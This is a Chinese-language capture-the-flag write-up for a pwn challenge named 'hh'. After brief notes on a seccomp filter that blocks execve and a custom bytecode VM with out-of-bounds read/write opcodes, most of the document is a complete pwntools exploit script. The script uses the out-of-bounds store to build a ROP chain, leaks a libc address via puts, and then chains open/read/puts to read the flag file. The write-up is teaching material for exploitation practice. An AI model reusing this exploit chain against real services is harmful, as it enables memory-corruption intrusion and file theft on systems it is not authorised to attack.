pwn-hh
在 IDA 中查看:程序先让用户输入一段内容(something),然后进入 exec_code。
看到使用了 prctl,用 seccomp-tools 查看,发现屏蔽了 execve,因此可以构造 ORW。
kali@kali:~/ctf/pwn/ti/hh$ seccomp-tools dump ./hh
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x05 0xc000003e if (A != ARCH_X86_64) goto 0007
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x02 0xffffffff if (A != 0xffffffff) goto 0007
0005: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0007
0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0007: 0x06 0x00 0x00 0x00000000 return KILL
exec_code 是一个自定义的虚拟机:opcode 9 是 push,0xa/0xb 可以越界读,0xc/0xd 可以越界写。
使用push和越界写,构造rop,先泄露libc,再构造orw。
exp:
#encoding=utf-8
# Custom virtual machine: the target's exec_code interprets a small bytecode,
# and its out-of-bounds store is what places the ROP chain below.
from pwn import *
context(os='linux',arch='amd64')
#context.log_level = 'debug'
path='/home/kali/ctf/pwn/ti/hh/'
#r = process(path+'hh')
#r = process([path+"ld-2.23.so",path+'hh'],env={"LD_PRELOAD":path+'libc.so.6'})
r = remote('node3.buuoj.cn',25897)
elf = ELF(path+'hh')
libc = ELF(path+'libc.so.6')
# Hard-coded addresses inside the binary; presumably it is loaded at a fixed
# base (non-PIE), otherwise these would need a leak too — confirm.
poprdi_addr = 0x4011A3
#poprsi_addr = 0x4011A1
main_addr = 0x401084
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
def addrop(val):
    """Append VM bytecode that stores the 64-bit value ``val`` into the
    next two 32-bit slots of the target.

    Each half is emitted as ``push <half>; store <idx>`` using the module
    globals ``vpush`` / ``vstore`` as opcodes; the low half goes first,
    then the high half. Mutates the module globals ``payload`` (bytes
    appended) and ``idx`` (advanced by two).
    """
    global idx, payload
    low_half = val & 0xffffffff
    high_half = (val >> 32) & 0xffffffff
    for half in (low_half, high_half):
        payload += p32(vpush) + p32(half) + p32(vstore) + p32(idx)
        idx += 1
# VM opcodes used by addrop: 9 = push, 0xd = (out-of-bounds) store.
vpush = 0x9
vstore = 0xd
# Stage 1: leak the address of puts, then return to main for a second round.
# Chain: pop rdi; <puts@got>; puts@plt; main
payload=b''
# Slot index the stores land on; presumably the saved return address,
# 0x1F50 + 8 bytes past the VM buffer, in 4-byte slots — confirm in the binary.
idx=(0x1F50+0x8)//4
addrop(poprdi_addr)
addrop(puts_got)
addrop(puts_plt)
addrop(main_addr)
r.sendlineafter('Give me you choice :\n', '1')
r.sendlineafter('code:', payload)
r.sendlineafter('Give me you choice :\n', '2')
#puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
# puts prints the significant bytes of the address followed by a newline;
# strip it and pad to 8 bytes for u64.
puts_addr=u64(r.recvline().rstrip().ljust(8,b'\x00'))
print("puts_addr:"+hex(puts_addr))
base_addr= puts_addr - libc.symbols['puts']
print("base_addr:"+hex(base_addr))
open_addr=base_addr+ libc.symbols['open']
read_addr=base_addr+ libc.symbols['read']
write_addr=base_addr+ libc.symbols['write']
# libc gadget offsets; these are specific to the supplied libc.so.6 build.
# pushrax_addr is computed but not used by the chain below.
poprdx_addr = base_addr + 0x0000000000001b92
pushrax_addr = base_addr + 0x0000000000010f40
poprsi_addr = base_addr + 0x00000000000202f8
# Stage 2: the seccomp filter kills execve but allows open/read/write, so
# the chain reads the file instead of spawning a shell:
# open("flag", 0);
# read(3, buf, 64);
# write(1, buf, 64);
# puts(buf)
# Writable area in the binary; presumably where the VM code/data buffer
# lives, so a payload offset maps to buf_addr + offset — confirm.
buf_addr = 0x602060
payload=b''
idx=(0x1F50+0x8)//4
# Byte offset inside the payload where the "flag" data is appended (checked
# by the length print below); +4 skips the p32(16) word in front of it.
flag_addr_off = 480
rbuf_addr = buf_addr+flag_addr_off+4
# open(&"flag", 0): rdi = address of the "flag" string, rsi = 0
addrop(poprdi_addr)
addrop(buf_addr+flag_addr_off+4)
addrop(poprsi_addr)
addrop(0x0)
addrop(open_addr)
# read(3, buf, 64): fd 3 assumed to be the descriptor returned by open
addrop(poprdi_addr)
addrop(3)
addrop(poprsi_addr)
addrop(rbuf_addr)
addrop(poprdx_addr)
addrop(64)
addrop(read_addr)
'''
#write(1, buf, 64) p64(poprdi_addr)+ p64(2)+p64(poprsi_addr)+ p64(bss())+p64(poprdx_addr)+ p64(10)+p64(read_addr)
addrop(poprdi_addr)
addrop(1)
addrop(poprsi_addr)
addrop(rbuf_addr)
addrop(poprdx_addr)
addrop(64)
addrop(write_addr)
'''
# puts(buf): print the bytes that read() placed at rbuf_addr
addrop(poprdi_addr)
addrop(rbuf_addr)
addrop(puts_plt)
# Sanity check: this length must equal flag_addr_off (480), since the flag
# data is appended right after the chain.
print('flag_addr_off:'+str(len(payload)))
# 16 is presumably a VM opcode/terminator preceding the data — confirm.
# 0x67616c66 is "flag" in little-endian; the trailing 0 terminates it.
payload+=p32(16)+p32(0x67616c66)+p32(0) # flag data; its address can be computed and filled in above
#gdb.attach(r, 'b *0x4011A3')
r.sendlineafter('Give me you choice :\n', '1')
r.sendlineafter('code:', payload)
r.sendlineafter('Give me you choice :\n', '2')
r.interactive()